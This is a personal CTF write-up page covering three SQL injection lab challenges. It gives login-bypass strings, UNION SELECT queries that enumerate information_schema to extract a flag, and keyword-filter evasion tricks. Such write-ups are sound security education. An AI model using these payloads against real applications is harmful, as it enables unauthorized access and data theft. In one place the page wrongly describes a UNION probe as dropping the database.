Home
Github
  • 👋Welcome !
  • 🚩CTF Writeups
    • SKR CTF
      • Binary
        • Auth Me 2.0
      • Misc
        • Schrodinger's Cat 2
      • Reverse Engineering
        • Nogard 3
    • osu!gaming CTF 2024
      • pwn
        • betterthanu
    • Crackmes
      • PieIsMyFav
      • Plain Sight
    • WolvCTF 2024
      • pwn
        • babypwn
    • TexSAW CTF 2024
      • rev
        • Catch The White Rabbit
      • Forensics
        • Malicious Threat
        • MalWhere?
    • SwampCTF 2024
      • Misc
        • Lost Some Magic
        • The Time Equations
    • pwnable.kr
      • Toddler's Bottle
        • fd
    • Codegate CTF 2024
      • ai
        • ai_warmup
    • Junior Crypt CTF 2024
      • Misc
        • Terms of Use
      • Forensics
        • Admin Rights
        • Confusion
      • PPC
        • l33t
    • IHack 2024 Qualification
      • DFIR
        • Happy SPLUNKing
      • Malware
        • Confusing Javascript
    • Malcore Challenge
    • Intern Task
      • SQLI
  • 📮Room/Machine
    • HTB - Sherlock
      • DFIR
        • Brutus
        • Unit42
        • Jingle Bell
  • 📚Notes
    • CTF Related
      • pwn
        • pwntools
        • Format String Vulnerability
        • Integer Overflow
        • Executable Properties
        • gdb-gef
        • Template Script
      • b2r/koth
    • Assembly Language
    • x86 Architecture
  • 🛠️Tools
    • DFIR
    • Malware Analysis
    • Essentials
  • 👽Threat Hunting
    • Intro
    • Common Tactics
    • Methodologies
    • Types of threat hunting
  • 😸whoami
    • About Me
    • Other
      • FYP
  • Archives
    • 3108 CTF
      • Kategori
        • Tugasan Utama : Warkah Untuk Perwira
          • Tugasan I : Seruan Perwira
          • Tugasan II : Tali Barut
          • Warkah Akhir
        • Web
          • Lemah
          • Pantun Pantul
          • Wantujus
          • Wantusom
        • Reverse Engineering
          • Pa+rio+ik
          • Sarawak
        • Network
          • Johan
          • Lagi-lagi Johan
        • Misc
          • 3108 CTF Town
          • Mencari Rahsia Si Dia
        • Cryptography
          • 1957bit
          • Nasihat
          • Selamat Malam
        • OSINT
          • Pertemuan Kapisata : Babak I
          • Pertemuan Kapista : Babak II
          • Pertemuan Kapista : Finale
    • Curtin CTF 2023
      • Pwn n Rev
        • Classic Bufferoverflow
        • Intro to Buffer Overflow
        • Don't Go Overboard
        • Don't Go Overboard 2
        • Let The Random Games Begin1
        • Let The Random Games Begin 2
        • Let The Random Games Begin 3
    • 1337UP LIVE CTF
      • Pwn
        • Floor Mat Store
    • HTB University CTF 2023
      • Reverse Engineering
        • Windows Of Opportunity
Powered by GitBook
On this page
  • Chal 1
  • Flag
  • Chal 2
  • Flag
  • Chal 3
  • Flag
  1. CTF Writeups
  2. Intern Task

SQLI

Last updated 8 months ago


Chal 1

Given a basic login form with username and password required. Since those credentials were not provided, it's time for SQLI. There are many ways to bypass this login form

' OR 1 --
test ' --
anything ' #

Flag

4turkr34tif24{F1R5T_5T3P_PR0_SQLi}


Chal 2

Given was a flight tracking website. User need to enter their tracking number in the form.

To validate whether the database using sql or not, put any sql syntax in that form and it will displayed an error or warning.

This challenge is different than the one before. The idea here is to drop the database instead of bypassing the credential checking.

-1 union select null, null, null, null, null, null, null --

Search for table count using the 'null's. If it hits, it will drop the database

Now, the database is present. Look for the suitable table and column.

-1 'union select null, null, table_name, null, null, null, null from information_schema.tables --

To look for the column, use this.

-1 'union select null, null, column_name, null, null, null, null from information_schema.columns where table_name = 'fl4g' --

Now that the right column and table are identified, just craft the right syntax

-1 'union select null, null, f0undM3, null, null, null, null from fl4g --

Flag

4turkr34tif24{h4v354f370urn3y}


Chal 3

For Level 1, there's many payload to bypass this since it filters OR

admin' #
admin' --
'='

Level 2 filters OR, AND, LIKE, --, =

Use the payload to bypass it.

admin' #

Level 3 filters OR, AND, LIKE, --, =, <, >

Again, just need to comment out the rest of the code.

admin #

Level 4 filters OR, AND, LIKE, --, =, <, >, UNION, ADMIN

The only way to input 'admin' without input 'admin' is to seperate the word.

ad'|'min' #

Flag

Flag: 4turkr34tif24{H4141_1NJ3c710N_!??}

🚩
this table is the interesting one
this column is the interesting one